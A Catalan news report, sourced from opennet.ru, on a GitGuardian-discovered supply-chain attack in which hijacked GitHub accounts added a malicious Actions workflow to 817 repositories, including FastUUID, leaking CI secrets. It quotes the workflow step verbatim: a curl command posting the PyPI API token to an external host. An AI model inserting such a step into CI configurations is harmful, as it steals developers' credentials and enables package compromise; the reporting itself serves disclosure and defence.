Investigadors de GitGuardian han identificat un atac massiu contra usuaris de GitHub que va implicar prendre el control de 327 comptes i instal·lar un controlador d'accions de GitHub maliciós en 817 repositoris. L'atac va provocar la filtració de 3325 secrets utilitzats en sistemes d'integració contínua i que es van passar a través de variables d'entorn, inclosos tokens d'accés a PyPI, GitHub, NPM, DockerHub i diversos serveis d'emmagatzematge al núvol.
Les accions de GitHub permeten als desenvolupadors de codi adjuntar controladors per automatitzar diverses operacions a GitHub. Per exemple, les accions de GitHub es poden utilitzar per realitzar certes comprovacions i proves en fer commits o per automatitzar el processament de nous incidències. El controlador maliciós es va distribuir amb el nom de "Github Actions Security" i incloïa una ordre "curl" a la secció "run" que enviava el contingut de les variables d'entorn a un amfitrió extern en executar tasques en un entorn d'integració contínua. El commit maliciós es va afegir des dels comptes dels mantenidors del projecte, que probablement havien estat piratejats o havien fet comiats de suplantació d'identitat (phishing).
L'atac es va descobrir després d'analitzar l'activitat anòmala relacionada amb el paquet FastUUID, que proporciona un contenidor Python per a la biblioteca Rust UUID. FastUUID, que s'ha descarregat gairebé 1.2 milions de vegades la setmana passada, s'utilitza com a dependència en el popular projecte LiteLLM, que té més de 5 milions de descàrregues per setmana a PyPI. L'anàlisi dels canvis al repositori FastUUID va mostrar que el 2 de setembre, el mantenidor del projecte va afegir un commit amb un nou controlador d'accions de Github, que contenia codi per enviar un token al repositori PyPI en un amfitrió extern. — nom: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
El problema es va identificar abans que els atacants utilitzessin el testimoni interceptat: no es van publicar canvis maliciosos ni versions modificades del paquet a PyPI per a FastUUID. Es van detectar substitucions similars d'accions de Github en 816 repositoris més i es van enviar notificacions als seus propietaris, així com a l'administració de PyPI, GitHub, NPM i DockerHub. Fins ahir al vespre, s'havien revertit commits maliciosos en uns 100 repositoris. Actualment, una cerca a GitHub identifica 671 commits amb accions de Github malicioses.
Font: opennet.ru
